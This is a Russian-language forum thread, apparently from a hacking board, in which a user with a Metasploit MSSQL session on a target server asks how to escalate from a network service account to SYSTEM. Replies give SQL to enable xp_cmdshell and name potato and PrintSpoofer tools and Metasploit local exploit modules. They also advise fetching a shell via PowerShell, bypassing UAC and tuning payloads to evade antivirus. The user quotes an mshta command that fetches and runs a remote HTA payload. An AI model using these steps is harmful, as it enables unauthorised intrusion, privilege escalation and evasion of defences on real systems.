Имею mssql сессию в метасплоите. через модуль mssql_exec показывает права "nt authority\network service". Как можно повысить права до администратора или системы? учетка в mssql "sa"
как мне подгрузить exe в систему, если в msf в меня sql сессия только?2. У сервисных акков есть SeImpersonatePrivilege(можешь проверить через whoami /priv), а значит можно привэскнуться до системы через картошку или спуллер, в зависимости от версии сервера(RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato, JuicyPotato)
У тебя ж уже выполнение команд через mssql_exec, заспавни себе новый шелл через него(скачай его любым удобным способом, через пш например), а потом выполни. Заспавнится обычная мсф сессия от имени mssql сервис акка, а дальше уже привэскайсякак мне подгрузить exe в систему, если в msf в меня sql сессия только?
есть статья?У тебя ж уже выполнение команд через mssql_exec, заспавни себе новый шелл через него(скачай его любым удобным способом, через пш например), а потом выполни. Заспавнится обычная мсф сессия от имени mssql сервис акка, а дальше уже привэскайся
Твоего конкретного кейса не нашел(на самом деле тебе просто надо открыть более удобный шелл, а потом уже привэскаться, но никто не запрещает выполнять все и через mssql_exec, хотя для картошки все равно надо будет залить твой имплант, он запустится и отстрельнет под системой)есть статья?
у меня есть сессия sql в метасплоите.Чтобы повысить права с nt authority\network service до Administrator или SYSTEM, можно попробовать следующие варианты:
1-Активация xp_cmdshell : Используй учетную запись sa для выполнения команд системы:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
2-Эксплуатация локальных уязвимостей:
Попробуй модули Metasploit:exploit/windows/local/ms16_032_secondary_logon_handle_privesc для повышения прав до SYSTEM.
exploit/windows/local/ms10_015_kitrap0d для эксплуатации уязвимости в win32k.sys на старых версиях Windows.
xp_cmdshell, через него подгружаешь файл и запускаешькак мне подгрузить exe в систему, если в msf в меня sql сессия только?
я могу использовать модуль mssql_exec. но как чего него подгрузить файл и получить другую оболочку?xp_cmdshell, через него подгружаешь файл и запускаешь
Возможно, я пока с mssql не работал(не доводилось)я могу использовать модуль mssql_exec. но как чего него подгрузить файл и получить другую оболочку?
Придумал - выполни команду mssql_exec, чтобы выполнить запрос к MSSQL, а в команде mssql_exec выполни следущее - xp_cmdshell и команду, т.е. команда должна выглядеть как то так: mssql_exec xp_cmdshell <команда>(ну я не знаю точный синтаксис)я могу использовать модуль mssql_exec. но как чего него подгрузить файл и получить другую оболочку?
в модуле mssql_exec и так используя xp_cmdshell он выполняет команды в системе. но нет прав для определенных действий.Придумал - выполни команду mssql_exec, чтобы выполнить запрос к MSSQL, а в команде mssql_exec выполни следущее - xp_cmdshell и команду, т.е. команда должна выглядеть как то так: mssql_exec xp_cmdshell <команда>(ну я не знаю точный синтаксис)
Так повысь их и всё, была проблема в исполнении комманд, вот исправилось всё, теперь просто байпась UAC, ну или повышай привилегиив модуле mssql_exec и так используя xp_cmdshell он выполняет команды в системе. но нет прав для определенных действий.
у меня с начала создания данной темы не было проблем с выполнением команд в системе. мне нужно повысить как-то права. но mssql_exec не позволяет закидывать пэйлоад, либо файл на таргетТак повысь их и всё, была проблема в исполнении комманд, вот исправилось всё, теперь просто байпась UAC, ну или повышай привилегии
Так через xp_cmdshell закиньу меня с начала создания данной темы не было проблем с выполнением команд в системе. мне нужно повысить как-то права. но mssql_exec не позволяет закидывать пэйлоад, либо файл на таргет
Проблема на таргет файл кинуть?у меня с начала создания данной темы не было проблем с выполнением команд в системе. мне нужно повысить как-то права. но mssql_exec не позволяет закидывать пэйлоад, либо файл на таргет
авер палит пэйлоад. пробовал через hta exploit и дальше "cmd.exe /c mshta http://ip:8080/exploit.hta". и не срабатываетПроблема на таргет файл кинуть?
чекай какой авер и чисти под него что там у тебяавер палит пэйлоад. пробовал через hta exploit и дальше "cmd.exe /c mshta http://ip:8080/exploit.hta". и не срабатывает